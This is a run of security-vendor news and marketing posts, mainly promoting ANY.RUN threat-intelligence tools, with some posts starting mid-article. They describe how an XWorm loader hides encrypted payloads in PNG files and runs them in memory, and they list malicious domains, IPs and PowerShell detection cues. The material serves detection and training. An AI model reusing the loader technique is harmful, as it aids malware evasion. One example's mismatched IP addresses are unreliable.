Every Alert Costs 

When analysts are buried under thousands of notifications, they spend more time triaging noise than responding to real incidents. The result: slower reaction times, missed threats, staff burnout, and ballooning operational costs. 

Every wasted minute translates into a weaker security posture, potential financial loss, and reduced return on your security investments. Alert overload doesn’t just impact your SOC. 

It slows down your entire organization’s ability to respond, recover, and produce revenue.  

What Doesn’t Work 

Organizations often try to tackle alert overload by: 

• Hiring more analysts — which increases headcount costs but doesn’t reduce the noise. 

• Relying on strict filtering rules — which risks missing critical alerts. 

• Adding more tools — which only multiplies data sources and dashboards. 

• Automating without context — which accelerates the wrong decisions. 

These approaches attack the symptoms, not the cause: the lack of context around alerts. Without understanding what triggered an alert and how relevant it is, teams will always be stuck firefighting instead of investigating. 

What Works: Context Powered by Threat Intelligence 

The sustainable way to overcome alert overload is to improve alert quality through contextual threat intelligence. 

When analysts can instantly enrich alerts with reliable, up-to-date data on IOCs, malware families, and infrastructure, they can prioritize faster and make confident decisions. 

This is where ANY.RUN’s Threat Intelligence Lookup comes in — a solution designed to balance the speed of investigation with data completeness, freshness, and accuracy. 

It helps teams quickly understand whether an alert is linked to a known threat, how serious it is, and whether it requires escalation. The outcome: fewer false positives, faster triage, and more efficient use of human and financial resources. 

Threat Intelligence Lookup delivers instant context for IOCs, domains, IPs, hashes, and other artifacts. The data is sourced from 15,000+ SOC environments and millions of malware analysis sessions in ANY.RUN’s Interactive Sandbox, constantly refreshed to reflect real-time global threat activity. 

Benefits for analysts: 

• Immediate access to verified IOC data — no need to switch between platforms. 

• Clear visual indicators of threat relevance and relationships. 

• Faster, more accurate triage decisions. 

Benefits for business: 

• Lower operational costs by reducing wasted analyst hours. 

• Improved detection-to-response ratio, strengthening security ROI. 

• More predictable and measurable SOC performance. 

Try TI Lookup and discover how faster triage turns into measurable cost savings -> Contact ANY.RUN to get 50 trial lookups 

How It Works 

Here is an example of how security teams use TI Lookup to streamline their alert workflows and decision-making. 

Suppose analysts receive an alert on a suspicious domain. TI Lookup provides an instant verdict on the potential indicator along with contextual data:  

domainName:”databap.mom” 

Domain search results: malicious label, linked IOCs, sandbox analyses 

A quick lookup later, your team understands:  

• The domain is a malicious activity indicator; 

• It is associated with the dangerous Lumma stealer; 

• Lumma now targets US and Europe;  

• It has been detected in recent campaigns; 

• It helps to harvest additional IOCs; 

• There are malware sample sandbox analyses featuring this domain that allow to understand the threat’s behavior and TTPs.  

From Overload to Efficiency and Profitability 

When your SOC operates with context-rich data, the entire detection and response cycle accelerates. Analysts stop wasting time on noise. Decision-making becomes data-driven, not reactive. 

That directly translates to measurable business value: 

• Reduced mean time to detect (MTTD) and respond (MTTR). 

• Better analyst productivity without expanding the team. 

• Tangible cost savings from automation that works with — not against — human intelligence. 

In short, eliminating alert overload isn’t just about comfort for the SOC team. It’s a strategic financial decision that strengthens resilience, reduces risk exposure, and safeguards your bottom line. 

Conclusion 

Alert overload can’t be solved by more people or more tools — only by smarter data.

By empowering your SOC with contextual threat intelligence from ANY.RUN’s Threat Intelligence Lookup, you transform chaos into clarity, alerts into insights, and effort into measurable value. 

Accelerate response, control costs, and maximize your team’s performance with TI Lookup. --> Start your trial today.  

The post How to Solve Alert Overload in Your SOC  appeared first on Cyber Security News.

What appears to be an ordinary graphic actually contains encrypted loaders that execute entirely in memory, allowing the malware to bypass most traditional detection methods and signature-based defenses. 

Let’s break down how this attack works and what analysts and hunters should look for. 

Attack Overview with Real-World Example 

The infection starts with a malicious JavaScript installer named PurchaseOrder_25005092.JS, delivered through phishing emails and web pages (T1566.001). 

The script is obfuscated using an Immediately Invoked Function Expression (IIFE) pattern (T1027) and writes three staged files to: C:\Users\PUBLIC\  

These files are named:  

• Kile.cmd  

• Vile.png  

• Mands.png  

While the .png extension suggests images, these are not image files. Instead, they act as storage containers for Base64-encoded and AES-encrypted payloads (T1036.008); a common trick to avoid quick signature-based detection. 

You can view the full attack chain and download an actionable analysis report from a real-world run inside ANY.RUN’s interactive sandbox: 

View Recent Attack Hiding XWorm in PNG 

Steganography attack discovered inside ANY.RUN sandbox 

See every stage of execution unfold in seconds, extract IOCs automatically, and transform hidden malware behavior into clear, shareable insights. 

Get 14-Day Trial of ANY.RUN 

Execution Chain Breakdown: What Analysts Need to Know 

Below is a concise, step-by-step breakdown of the execution chain to help analysts quickly identify key artifacts and pivot points.

Follow each stage to see where to hunt, which logs to inspect, and which indicators to extract for detection and response. 

Persistence and setup 

The JavaScript creates a scheduled task (T1053.005) to maintain persistence after reboot. It checks for required artifacts and recreates them using long Base64 blobs and AES-encrypted strings (T1027.013). 

Obfuscated batch staging (Kile.cmd) 

Kile.cmd contains heavy obfuscation: variable noise, percent-substitutions, and chunked Base64 fragments. At runtime it reassembles commands and launches the PowerShell loader (T1059). 

Two-stage PowerShell loader 

Stage 1 – Command runner: Reads Mands.png, Base64-decodes and AES-decrypts it, then decodes the contained commands and executes them via Invoke-Expression (IEX). 

Stage 2 – In-memory assembly loader: Reads Vile.png, Base64-decodes and AES-decrypts it to raw bytes, then loads a .NET assembly directly into memory and invokes its entry point (T1620). 
The combined result is a fileless, in-memory loader that launches XWorm. 

XWorm execution chain with hidden PNG 

Pro Threat Hunting Tips: Detecting Fileless and Steganographic Loaders 

Below is a focused checklist for analysts and hunters to identify steganography-backed, in-memory loaders like XWorm. Use these steps to spot unusual patterns early and validate findings through behavioral analysis:  

1. Inspect image files: Scan .png and .jpg files for unusually long Base64 strings, text chunks, or non-image data. High text-to-binary ratios or embedded AES-encrypted sections often indicate hidden payloads. 

2. Monitor PowerShell activity: Track commands using Invoke-Expression, FromBase64String, or AES routines. Correlate these with script origins like wscript.exe or .cmd files to spot reflective execution and in-memory loaders. 

3. Correlate scheduled task creation: Look for tasks created by JavaScript or batch scripts from user directories rather than system paths. Such entries often indicate persistence after initial compromise. 

4. Use dynamic analysis: Static scans miss many steganographic loaders. Run suspicious scripts and files in an interactive sandbox like ANY.RUN to observe decryption, staging, and memory execution in real time, and extract IOCs from each stage. 

How a Sandbox Speeds Up Detection in Steganographic Attacks 

Steganographic loaders like XWorm rely on multi-stage execution and memory-only payloads, which makes them nearly invisible to static scanners.

A sandbox environment changes that by showing what’s actually happening under the surface; file writes, decryption routines, and PowerShell commands executed in real time. 

With ANY.RUN’s interactive sandbox, analysts can: 

• Watch the full chain unfold; from the initial JavaScript dropper to in-memory execution. 

• Extract and visualize IOCs such as decoded scripts, file paths, and registry modifications. 

• Confirm persistence and C2 activity without waiting for signatures or EDR alerts. 

This level of visibility turns a stealthy, fileless infection into a transparent, traceable process, helping threat hunters respond faster and with evidence-based clarity. 

Turn Complex Attacks into Clear Evidence in Seconds 

Attackers are getting better at blending in; the only reliable defense is to observe their behavior, not just their dropped files.

In nearly 90% of cases, ANY.RUN reveals full attack behavior in under 60 seconds, turning fleeting, fileless activity into concrete evidence analysts can act on immediately. 

Key benefits for analysts & threat hunters: 

• Real-time visibility for faster decisions: Instantly see how loaders unpack, decrypt, and execute without waiting for static scans or vendor signatures. 

• Fewer false positives: Behavioral context makes it easy to distinguish real threats from benign automation or scripts. 

• End-to-end understanding: Watch how each process connects, what files are written, and how persistence is achieved. 

• Time savings in triage and investigation: Complete analysis and IOC extraction in minutes, not hours. 

• Seamless workflow integration: Push results directly to SIEM, SOAR, or case management tools through ready-made connectors. 

• Collaboration made easy: Share live sessions, findings, and visual reports across teams for quicker consensus. 

• Continuous learning and hunting: Mapped MITRE ATT&CK TTPs and decoded artifacts enrich detection logic and threat intelligence feeds. 

Ready to see it in action? Talk to ANY.RUN experts and discover how interactive analysis helps your team find and stop threats static tools miss. 

The post New Wave of Steganography Attacks: Hackers Hiding XWorm in PNGs  appeared first on Cyber Security News.

ThreatBook, a global leader in threat intelligence-based cybersecurity solutions, today announced that for its Threat Detection Platform (TDP), it has been recognized as a Strong Performer in the 2025 Gartner Peer Insights Voice of the Customer for Network Detection and Response (NDR).

This marks the third consecutive year that ThreatBook has received this distinction, which we believe underscores consistent customer satisfaction, product innovation, and operational excellence.

According to Gartner: “‘Voice of the Customer’ is a document that synthesizes Gartner Peer Insights reviews into insights for buyers of technology and services. This aggregated peer perspective, along with the individual detailed reviews, is complementary to Gartner expert research and can play a key role in your buying process. Peers are verified reviewers of a technology product or service, who not only rate the offering, but also provide valuable feedback to consider before making a purchase decision.”

“We’re thrilled to be recognized again as a Strong Performer in the Gartner Peer Insights ‘Voice of the Customer’ for NDR,” said Mr. Feng XUE, Chief Executive Officer of ThreatBook. “Our mission is to empower security teams with visibility and precision, especially in the Asia-Pacific region where attacks are becoming more sophisticated and targeted. We believe, this recognition reflects our customers’ trust in ThreatBook TDP’s ability to deliver real detection accuracy and operational resilience.”

Recognition Driven by Real-World Customer Feedback

To be included in the report, vendors must meet stringent inclusion criteria and are positioned within four quadrants based on user interest, product experience, and overall satisfaction — covering areas such as product capabilities, support, and delivery.

According to the research: “in the network detection and response market, Gartner Peer Insights published 1,263 reviews and ratings during the consideration period,” with 11 vendors ultimately meeting the inclusion standards. ThreatBook is among the few vendors recognized as a Strong Performer for three consecutive years. ThreatBook was among the few vendors to meet the full inclusion criteria and achieved 100% of customers willing to recommend ThreatBook TDP, based on 43 overall verified reviews submitted as of Aug 2025.

Enterprise users from finance, manufacturing, energy, services, and retail sectors across Asia-Pacific, North America, the Middle East, and Europe contributed feedback that rated ThreatBook TDP highly in overall product experience, detection precision, and operational efficiency.

TDP: Industry Leading Intelligence-Driven Detection and Response

As the market leader in China’s threat intelligence sector (iResearch, 2024 China Threat Intelligence Industry Development Report), ThreatBook integrates high-fidelity threat intelligence into its detection and response solutions.

ThreatBook TDP is a full-traffic, intelligence-driven NDR platform designed to provide visibility, context, and actionability at scale.

Key strengths include:

l High-Precision Detection – Built on ThreatBook’s proprietary global and APAC threat intelligence, TDP achieves industry-leading detection accuracy for targeted and advanced attacks.

l Operational Readiness – Automatically maps enterprise attack surfaces and reconstructs attack chains from an adversarial perspective for proactive defense.

l Closed-Loop Response – Integrates with a broad ecosystem of security tools, supporting automated blocking and orchestration with 99% effectiveness.

l User-Focused Experience – Offers an intuitive interface and multi-dimensional analytics to enhance SOC efficiency and decision-making.

Proven Across Industries and Regions

Today, ThreatBook TDP is deployed in thousands of leading enterprises across critical industries including finance, energy, power, internet, and smart manufacturing.

It has become a core detection and response system for enterprise and government SOCs, helping them achieve visibility, precision, and proactive defense in dynamic threat environments.

Full review: https://www.gartner.com/reviews/market/network-detection-and-response/vendor/threatbook/product/threatbook-tdp-ndr/review/view/6146934

Full Review: https://www.gartner.com/reviews/market/network-detection-and-response/vendor/threatbook/product/threatbook-tdp-ndr/review/view/6145510

Gartner, Voice of the Customer for Network Detection and Response, 30 October 2025

* Disclaimer: GARTNER and PEER INSIGHTS are registered trademarks of Gartner, Inc. and/or its affiliates in the U.S. and internationally and are used herein with permission. All rights reserved. Gartner Peer Insights content consists of the opinions of individual end users based on their own experiences, and should not be construed as statements of fact, nor do they represent the views of Gartner or its affiliates. Gartner does not endorse any vendor, product or service depicted in this content nor makes any warranties, expressed or implied, with respect to this content, about its accuracy or completeness, including any warranties of merchantability or fitness for a particular purpose.

About ThreatBook

ThreatBook is a global cybersecurity company specializing in advanced threat intelligence, detection, and response. Founded in 2015, ThreatBook equips enterprises, governments, and service providers with the clarity and context needed to defend against evolving digital risks.

By combining artificial intelligence with deep threat intelligence, ThreatBook delivers real-time visibility, hyper-accurate detections, and early-warning insights against nation-state actors, cybercriminal groups, and emerging attack campaigns. 

With unique vantage points from across the Asia Pacific region and beyond, ThreatBook provides intelligence coverage that bridges Eastern and Western threat landscapes, offering an unmatched perspective for global defenders.

ThreatBook: Act with Intelligence that Matters. To learn more, visit www.threatbook.io or follow us on LinkedIn.

Contact

Belmont Communications
ThreatBook
threatbook@belmontcomms.co

The post ThreatBook Peer-Recognized as a Strong Performer in the 2025 Gartner® Peer Insights™ Voice of the Customer for Network Detection and Response — for the Third Consecutive Year appeared first on Cyber Security News.

Most solutions force you to choose. Some prove you don’t have to. 

The Intelligence Paradox: Too Much and Never Enough 

Every CISO knows the struggle. Deploy too few threat feeds, and you’re flying blind, missing critical indicators that could prevent the next breach.

Deploy too many, and your SOC analysts spend their days buried in alerts, chasing false positives, and burning out before they can focus on genuine threats. 

This isn’t just an operational headache. It’s a business risk. When analysts are overwhelmed, response times slow. When threat data arrives too late, attackers have already moved.

When intelligence lacks context, your team wastes hours investigating benign activity while real threats slip through undetected. 

The balance seems impossible: you need data that’s simultaneously comprehensive and curated, real-time and actionable, detailed and digestible.  

Business Resilience Happens When Context Meets Speed 

ANY.RUN’s Threat Intelligence Feeds are made with the key principle in mind. Quality feeds don’t just add data — they transform how your entire cybersecurity operation functions.

Think of them as your early warning system, your threat hunting compass, and your analyst productivity accelerator rolled into one. 

 
Or, probably, imagine combining a microscope with a telegraph. One gives you perfect detail; the other gives you instant transmission. Individually useful, but together? Transformative. 

But enough with metaphors. ANY.RUN’s TI Feeds solve the data paradox.  
 
Powered by data from over 15,000 SOCs and researchers using ANY.RUN’s interactive malware sandbox, the feeds deliver live intelligence on real attacks happening right now. Each record is backed by behavioral analysis and real-world evidence. 

Build resilience with live, contextual intelligence from 15K teams -> Request your TI Feeds trial 

This combination of context and freshness is critical for decision-makers. It means your analysts don’t waste time chasing false positives or outdated data. They can prioritize real threats, act early, and protect the organization’s assets before risk turns into loss. 
 
They integrate seamlessly with your SIEM, EDR, firewall, and other security tools, automatically enriching alerts with context and enabling automated response workflows.

They shift your posture from reactive to proactive, allowing you to block threats before they reach your network rather than scrambling after the breach. 

For MSSPs managing security across multiple clients, feeds become even more critical. They enable you to scale protection without scaling headcount proportionally, applying lessons learned from one customer’s threat landscape to protect all others instantly. 

Why Context Matters for Your Bottom Line 

Context transforms raw data into actionable intelligence. When your SIEM flags a suspicious IP address, generic feeds tell you “this is malicious.” 

ANY.RUN’s feeds tell you how it’s malicious, what malware family it’s associated with, which attack techniques it employs, and what IOCs you should look for across your environment. 

For security teams, this means: 

• Faster triage: Analysts immediately understand threat severity and scope; 

• Accurate prioritization: Distinguish between critical incidents and low-risk events; 

• Effective response: Know exactly which containment measures to deploy; 

• Reduced burnout: Spend time hunting real threats, not chasing shadows. 

For business leaders, context transforms into: 

• Lower operational costs: Less time wasted on false positives means better ROI on your security investment; 

• Faster time-to-resolution: Contextual intelligence accelerates incident response from hours to minutes; 

• Informed decision-making: Understand your actual risk exposure, not just a list of scary-sounding indicators. 

When your intelligence reflects the experience of 15,000 SOCs worldwide, you’re no longer reacting in isolation — you’re part of a collective defense network. 

Why Freshness Is Non-Negotiable 

Threat actors evolve their techniques daily, launching new campaigns, rotating infrastructure, and modifying malware to evade detection. 

ANY.RUN’s TI Feeds deliver intelligence with up-to-the-minute freshness because they’re derived from live analysis happening right now — as security teams worldwide investigate active threats using ANY.RUN’s Interactive Sandbox. 

This real-time advantage means: 

• Proactive blocking: Stop emerging threats before they become widespread; 

• Reduced dwell time: Detect active compromises faster with the latest IOCs; 

• Instant awareness: Gain visibility into novel attack techniques as they emerge; 

• Competitive protection: Access intelligence that attackers haven’t yet adapted to evade. 

For MSSPs, this freshness is a competitive differentiator. You can promise clients protection against threats that other providers won’t detect for days—because by the time those threats appear in slower feeds, you’ve already blocked them. 

Make your next security decision data-driven, turn live threat data into strategic advantage -> Start you trial of ANY.RUN’s TI Feeds 

TI Feeds: Business Objectives Met 

ANY.RUN’s Threat Intelligence Feeds deliver business value across multiple dimensions: 

• Real-World Threat Visibility: You’re receiving data about actual incidents and attacks that are impacting other companies right now. The threats currently investigated by 15,000 SOCs using ANY.RUN’s Interactive Sandbox.  

• Cost-Effective Scale: ANY.RUN’s Feeds give you enterprise-grade intelligence without enterprise-level overhead.  

• Regulatory Compliance and Due Diligence: Demonstrate to auditors, board members, and customers that you’re using current, comprehensive threat intelligence.  

• Improved Detection Rates: Enrich your existing security tools with high-fidelity indicators that dramatically reduce false negatives. Catch threats that generic signature-based detection misses. 

• Accelerated Incident Response: When a threat is detected, contextual intelligence means your team already knows the attack chain, associated IOCs, and effective countermeasures.  

• Strategic Planning Support: Aggregate intelligence helps security leaders identify trends, understand your industry’s threat landscape, and make informed decisions about security investments and priorities. 

• Reduced Analyst Fatigue: Analysts spend time doing interesting, meaningful work instead of drowning in noise. 

• Interoperability: The feeds integrate seamlessly with your existing security infrastructure: SIEM platforms, threat intelligence platforms, EDR solutions, firewalls, and more.  

Conclusion 

Cyber resilience isn’t about having more data — it’s about having the right data at the right moment. ANY.RUN’s Threat Intelligence Feeds provide exactly that: live, contextual insights from real incidents across the globe.

They help organizations cut through noise, reduce uncertainty, and make every security decision count. 

The post Why your Business Need Live Threat Intel from 15k SOCs appeared first on Cyber Security News.

Attackers increasingly abused platforms like Google, Figma, and ClickUp for credential theft, while LockBit’s latest iteration extended its reach to virtualized environments.

These incidents, analyzed by cybersecurity firms such as ANY.RUN underscores the need for behavioral detection beyond static indicators.​

Sophisticated Phishing Leverages Legitimate Platforms

Phishing attacks in October heavily relied on legitimate services to evade traditional filters, starting with a campaign mimicking Google Careers job offers.

Emails lured victims with fake application pages, routing through Salesforce redirects and Cloudflare Turnstile CAPTCHAs before harvesting credentials via domains like satoshicommands.com.

This multi-step attack chain targeted tech and consulting sectors, exploiting brand trust to enable account takeovers and data exfiltration.​

Similarly, Figma’s public prototypes became a vector for Microsoft-themed phishing, where shared “document” invites led to fake login pages, here is the attack analysis.

Groups like Storm-1747 drove nearly half of these attacks, using Figma’s trusted domain to embed interactive lures that bypassed email security. Victims encountered CAPTCHAs and redirects to credential-stealing sites, often linked to operators such as Mamba.​

ClickUp faced abuse as a redirector, with phishing emails directing users to doc.clickup.com, then hopping to Microsoft microdomains and Azure Blob Storage for final payload delivery. This chain mimicked collaboration traffic, making it hard for whitelists to flag, and resulted in widespread credential compromises.​

A standout development was TyKit, a reusable phishing kit first spotted in May 2025 but peaking in October. It hid obfuscated JavaScript in SVG files, using eval functions and Base64 encoding to redirect users to Microsoft 365 impersonators.

Affecting finance, government, and telecom across multiple regions, TyKit employed anti-debugging and staged C2 checks for evasion, leading to hundreds of account thefts via AitM techniques.​

Ransomware Targets Diverse Operating Systems

LockBit 5.0 emerged as a cross-platform threat on the ransomware front, celebrating the group’s sixth anniversary by expanding beyond Windows to Linux and VMware ESXi.

The variant analysis featured enhanced obfuscation, DLL reflection, and anti-analysis routines, allowing rapid encryption of virtual machines and datastores.

This enabled affiliates to disrupt entire data centers, with randomized extensions and log clearing complicating response efforts.​

The ESXi build was particularly alarming, targeting hypervisors to encrypt multiple VMs simultaneously, while Linux and Windows versions included region-based restrictions and service terminations.

Attacks hit enterprises in Europe, North America, and Asia, amplifying downtime and financial losses through shared infrastructure tactics.​

Security teams must prioritize sandbox detonation for SVG and redirect analysis, as static tools miss these behaviors. Implementing phishing-resistant MFA, monitoring for suspicious domains like segy.zip or hire.gworkmatch.com, and integrating threat intelligence feeds can mitigate risks.

Regular backups, VPN-enforced access, and behavioral monitoring in sandboxes like ANY.RUN’s reduce mean time to response, turning isolated indicators into proactive rules. As attackers refine cloud abuse, organizations should rehearse playbooks to counter the next surge.

Catch attacks early with instant IOC enrichment and interactive sandbox => Try Now

​

The post October Sees Rise in Phishing and Ransomware Attacks, Including TyKit and Google Careers Scams appeared first on Cyber Security News.

Every SOC sees thousands of signals: odd domains, masquerading binaries, strange persistence artifacts. On their own, these indicators mean almost nothing. A suspicious process might be malware or a legitimate update from a vendor you barely know. 

But the moment you add threat context — history, connected IOCs, malware family relations, sandbox behavior — the picture changes completely. 

Meet TI Lookup: The Context Engine 

ANY.RUN Threat Intelligence Lookup is a real-time investigation tool that lets analysts instantly understand what they’re dealing with — from domains and IPs to file hashes and URLs. 

It’s powered by rich data crowdsourced from 15,000+ SOCs and researchers worldwide, continuously enriched by ANY.RUN’s sandbox detections. Instead of wasting time digging through multiple feeds, analysts get actionable context in seconds. 

 
You achieve:  

• Instant clarity: Quickly identify whether an IOC is malicious, suspicious, or benign; 

• Deeper context: View sandbox behavior, relations, and threat actor links in one place; 

• Smarter triage: Speed up incident response with verified data and fewer false positives. 

Context turns data into decisions. And decisions stop breaches from happening. 

Here are five highly practical ways SOC analysts use context to speed triage, reduce noise, and fight more effectively: powered by ANY.RUN’s Threat Intelligence (TI) Lookup.  

Tactic 1: Domain Intelligence – From Suspicious to Confirmed Threat 

The Alert: 

Domain contacted: logrecovery[.]com 

Without Context: Could be legitimate cybersecurity resource. Requires manual investigation across multiple platforms. 

With TI Context: 

• Observed in AsyncRAT and Amadey sandbox executions; 

• Linked to active command-and-control infrastructure; 

• Associated with information-stealing campaigns and botnets. 

domainName:”logrecovery.com” 

Immediate Action: Block the domain at your proxy/firewall, tag it as a high-confidence IOC in your threat intelligence platform, and hunt retroactively for any historical connections in your network traffic logs. 
 
Why It Matters: Stealer malware exfiltrates credentials, session tokens, and sensitive data. Every minute it remains unblocked is a window for data theft. Context lets you move from “investigate” to “contain” immediately. 

Stop hunting for context, start acting on it. Sign up to trial Threat Intelligence Lookup and see how it works 

Tactic 2: Email Attachment Analysis – Spotting Campaign Patterns 

The Alert:  

Suspicious attachment: Electronic_Receipt 

Without Context: Generic filename. Could be legitimate invoice or phishing. Requires time-consuming manual analysis. 

With TI Context: 

• Detected in a number of malware analyses; 

• Part of  credential-harvesting campaigns; 

• Linked to a most dangerous Tycoon phishing kit. 

filePath:”Electronic_Receipt” 

Malware samples featuring file pattern 

Immediate Action: Add the file hash to your SIEM blocklist, check egress logs for any systems that may have already connected to associated C2 domains, and update mail gateway filters to catch variants. 

Why It Matters: Tycoon 2FA can intercept user credentials and session cookies to bypass MFA, enabling unauthorized access to accounts even with additional security measures. Organizations using cloud services are at the most risk.

Recognizing campaign patterns helps you understand the scope: is this a targeted attack or part of a broader spray-and-pray operation? Context answers that question instantly.  

Tactic 3: IP Address Intelligence – Understanding Payload Delivery 

The Alert: 

Outbound connection to: 45.155.205[.]11 
 
Without Context: Could be legitimate software update checks. Requires manual investigation across multiple platforms. 

With TI Context: 

• Observed in DBatLoader and GuLoader sandbox executions; 

• Linked to active command-and-control infrastructure; 

• Associated with information-stealing campaigns. 

destinationIP:”162.241.62.63″ 

IP context: malware and campaign associations 
 
Immediate Action: Block the domain at your proxy/firewall, tag it as a high-confidence IOC in your threat intelligence platform, and hunt retroactively for any historical connections in your network traffic logs. 

Why It Matters: Stealer malware exfiltrates credentials, session tokens, and sensitive data. Every minute it remains unblocked is a window for data theft. Context lets you move from “investigate” to “contain” immediately. 

Tactic 4: Process Behavior – Detecting Credential Theft 

The Alert: 

Unusual process detected: New Text Document mod.exe 

Without Context: Can be a nonchalantly attributed document, but the .exe extension arouses suspicion. Manual verification required. 

With TI Context: 

• Observed in XRed backdoor campaigns; 

• Associated with session hijacking and credential theft; 

• Tampers with Windows registry, establishes persistence. 

filePath:”New Text Document mod.exe” 

Malware running the similar process 

Immediate Action: Check all endpoints for this process name and file hash, flag any instances for immediate investigation, and monitor for suspicious authentication behavior patterns like impossible travel or unusual access times. 

Malicious process poorly disguised as a document 

Why It Matters: XRed is a backdoor designed for long-term system infiltration and control and stealing sensitive data. It combines elements of remote access Trojans (RATs), infostealers, and backdoors to execute a range of malicious activities. 

Tactic 5: Registry Key Persistence – Finding the Foothold 

The Alert:  
 
Registry modification: \Software\Microsoft\update 

Without Context: Registry changes happen constantly. Could be legitimate software, Windows updates, or persistence mechanism. Difficult to prioritize without additional information. 

With TI Context: 

• Appears in known malware persistence mechanisms 

• Seen in stealer campaigns 

• Used to maintain access across system reboots 

• Indicator of established compromise, not initial infection 

RegistryKey:”Software\\Microsoft\\update” and threatLevel:”malicious” 

Search for malware that modifies registry 
 
Immediate Action: Escalate immediately to incident response team, scan affected hosts for additional IOCs associated with notorious stealers, and check for lateral movement indicators across your environment. 

Why It Matters: If you’re seeing persistence mechanisms, the attacker has already established a foothold. This isn’t prevention, it’s containment. Context tells you this is a critical escalation requiring full IR protocols, not just endpoint remediation. 

The Context Advantage: From Hours to Minutes 

Each of these scenarios represents a fork at the road of a SOC analysts. Without context, you’re stuck in investigation mode chasing down leads, correlating data points, and hoping you make the right call. With context, you skip directly to response. 

Consider the time savings: 

• Manual TI gathering: 20-45 minutes per artifact across multiple platforms 

• TI Lookup with context: Seconds to retrieve comprehensive intelligence 

• Decision confidence: Immediate clarity on threat severity and appropriate response 

For a SOC analyst triaging 50+ alerts per day, that’s the difference between constantly playing catch-up and staying ahead of threats. 

How Threat Intelligence Delivers Context Automatically 

TI Lookup doesn’t just tell you whether an artifact is malicious, it shows you the full picture: 

• Sandbox execution history: See how the artifact behaves in real, interactive malware analysis sessions 

• Associated campaigns: Understand which threat actors and malware families use this indicator 

• Infrastructure relationships: Map connections between domains, IPs, and file hashes 

• Temporal context: Know if this is an emerging threat or part of an established campaign 

Instead of piecing together intelligence from multiple sources, you get a unified view that connects artifacts to actual malware behavior.  

Start Making Context-Driven Decisions Today 

Next time an alert hits your queue, ask yourself: do you have the context to act confidently, or are you about to spend the next thirty minutes hunting for it? 

Context isn’t a luxury for SOC analysts. It’s the difference between reactive scrambling and proactive defense. The threats are already using automation and infrastructure at scale. Your intelligence should, too. 

Ready to add context to your threat hunting workflow? Explore ANY.RUN’s TI Lookup and see how instant threat intelligence transforms the way you analyze and respond to security alerts. 

Speed without guessing, confidence without over-triaging. Choose threat intelligence trial option for your SOC. 

The post Beat Threats with Context: 5 Actionable Tactics for SOC Analysts  appeared first on Cyber Security News.

They dissected tactics like QR code phishing, ClickFix social engineering, and Living Off the Land Binaries (LOLBins), showing how these methods evade traditional defenses.

As threats grow more sophisticated, SOC teams face mounting pressure to adapt, with low detection rates risking severe breaches. Drawing from analyses of real-world samples, the session emphasized interactive tools and real-time intelligence as vital countermeasures.

ClickFix Attacks: Mastering Human Deception

ClickFix attacks stand out for their reliance on user interaction, turning routine verifications into malware gateways. Attackers send phishing emails mimicking trusted sites, like booking platforms, complete with fake CAPTCHAs.

Once a victim clicks, a malicious PowerShell script hijacks the clipboard unnoticed, prompting the user to paste and execute it via a system dialog.

This multi-stage ploy thrives on deception: double spoofing creates convincing replicas, while manual steps foil automated scanners.

Sandbox analyses reveal how execution deploys stealers like Lumma or AsyncRAT, plus ransomware, establishing persistence through startup files.

Traditional tools falter at CAPTCHAs, but interactive sandboxes simulate human actions, exposing the full chain from initial click to payload delivery in seconds.

Without such capabilities, SOCs miss threats that blend seamlessly into user workflows, leading to credential theft and system compromise.

PhishKit Attacks: QR Codes as Stealth Vectors

Phishing kits, or phishkits, have evolved into dark web staples, empowering novices to launch pro-level campaigns against giants like Microsoft and Google.

The latest twist integrates QR codes into PDF attachments disguised as DocuSign docs, directing scans to mobile devices where phishing cues hide on small screens.

These kits incorporate AI-generated lures, multi-stage checks, and CAPTCHAs like Cloudflare Turnstile, culminating in fake login pages for credential harvesting.

ANY.RUN’s automated detonation extracts QR links, solves challenges, and traces the kill chain, revealing ties to groups like Storm-1747.

Many defenses overlook QR content, allowing evasion, but advanced sandboxes handle this autonomously, cutting Tier 1 workloads by 20%. As phishkits proliferate, targeting regions via localized lures, SOCs must prioritize QR scanning to curb widespread campaigns.

LOLBins: Weaponizing Trusted Tools

LOLBins exploit Windows’ own utilities, PowerShell, mshta.exe, and cmd.exe to mask malice as routine operations. A phishing .lnk file might invoke mshta via PowerShell to fetch payloads from remote servers, downloading decoy PDFs to obscure the real stealer, like DeerStealer.

This “living off the land” approach evades whitelists and antivirus software by mimicking admin tasks, leaving faint forensic traces.

Behavioral analysis in sandboxes uncovers connections to C2 servers and persistence mechanisms, distinguishing abuse from legitimacy.

Without context from global investigations, alerts trigger false positives. Threat intelligence feeds, pulling fresh IOCs from thousands of sessions, enable real-time blocking, slashing response times.

The tactics employed by ClickFix, including interactivity, QR obfuscation, and LOLBin stealth, highlight the limitations of relying solely on automation.

ANY.RUN’s solutions, which combine interactive analysis with shared intelligence, enhance detection rates by 88% in under a minute and reduce mean time to resolve (MTTR) by 21 minutes.

Security Operations Centers (SOCs) that implement these solutions report a 30% decrease in escalations and a tripling of efficiency, thereby strengthening their defenses against an increasingly relentless adversary landscape.

Enhance your SOC Performance With Interactive Sandbox Threat Intelligence Lookup and Feeds => Try Now

The post Emerging Cyber Threats Featuring QR Codes ClickFix and LOLBins Challenging SOC Defenses appeared first on Cyber Security News.

One scan, and the victim lands on a fake login page designed to steal credentials or trigger a download; often from a mobile device completely outside your SOC’s visibility. 

Why Quishing Is Hard to Catch 

From a detection standpoint, Quishing breaks the usual rules. The phishing payload isn’t in the email body or attachment, it’s embedded inside an image as a QR code. That means: 

• No clickable links for secure email gateways or URL filters to analyze. 
• No obvious indicators for content inspection or heuristic engines. 
• No telemetry once the user scans the code on a mobile device outside the corporate network. 

Analyst’s New Weapon: Expose QR Phishing in Seconds 

For SOC analysts, Quishing is a time sink and a blind spot. Traditional tools can’t scan QR codes and decoding them manually is slow and risky. 

That’s why many teams now rely on interactive sandboxes like ANY.RUN to safely expose what’s hidden behind those codes without leaving the protected environment. 

Instead of extracting images or using external decoders, the sandbox automatically detects and decodes QR codes from emails, PDFs, and screenshots. 

It follows the resulting link in an isolated VM, giving analysts the full attack context, from payload delivery to network activity, in just seconds. 

Real-World Example: Voicemail Scam Exposed in Under 60 Seconds 

An email arrives claiming you’ve missed a voicemail. Instead of a link, it contains a QR code urging the user to “listen to the message.” 

Check how sandbox exposes the hidden QR code 

Once uploaded to ANY.RUN, the sandbox automatically detects and decodes the QR without manual extraction or third-party tools.  

Reveal complex threats in seconds inside ANY.RUN’s interactive sandbox, cutting investigation time and turning hidden attacks into clear evidence -> Join ANY.RUN now 

The decoded URL is displayed immediately in the Static Discovering section, and automated interactivity triggers a controlled browser session. 

